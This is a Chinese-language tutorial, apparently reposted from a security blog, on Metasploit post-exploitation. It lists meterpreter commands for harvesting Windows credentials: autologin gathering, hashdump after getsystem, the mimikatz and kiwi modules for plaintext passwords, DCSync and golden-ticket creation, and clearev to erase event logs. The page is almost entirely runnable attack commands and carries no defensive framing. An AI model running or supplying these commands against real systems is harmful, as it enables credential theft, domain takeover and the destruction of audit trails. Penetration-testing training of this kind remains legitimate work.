当前位置: 代码迷 >> 综合 >> Metasploit-进阶用户密码与mimikatz模块kiwi模块
  详细解决方案

Metasploit-进阶用户密码与mimikatz模块kiwi模块

热度:51   发布时间:2023-12-24 06:07:29.0

Metasploit

一. 基础

1. 抓取自动登录的密码

run windows/gather/credentials/windows_autologin

2. 未提权可以使用此命令查询hashdump

run windows/gather/smart_hashdump

在这里插入图片描述

3. 提权

getsystem

在这里插入图片描述

4. 提权后可执行 run hashdump 获取密码

run hashdump

在这里插入图片描述

二. mimikatz模块

1. 加载mimikatz模块获取更多权限

ps:mimikatz模块已经合并为kiwi模块

load mimikatz
kerberos:kerberos相关的模块livessp:尝试检索livessp凭据mimikatz_command:运行一个定制的命令msv:msv凭证相关的模块,列出目标主机的用户密码哈希ssp:ssp凭证相关的模块tspkg:tspkg凭证相关的模块wdigest:wdigest凭证相关的模块

在这里插入图片描述

使用 mimikatz_command 命令获取明文密码

mimikatz_command -f sekurlsa::searchPasswords

在这里插入图片描述

三. kiwi模块

1. 比 mimikatz 更强大的 kiwi 模块

load kiwicreds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码

在这里插入图片描述

2. creds_all 命令直接获取密码

creds_all

在这里插入图片描述

3. kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令

在这里插入图片描述

kiwi_cmd sekurlsa::logonpasswords

在这里插入图片描述

清除事件日志

clearev

在这里插入图片描述

摘要:谢公子学安全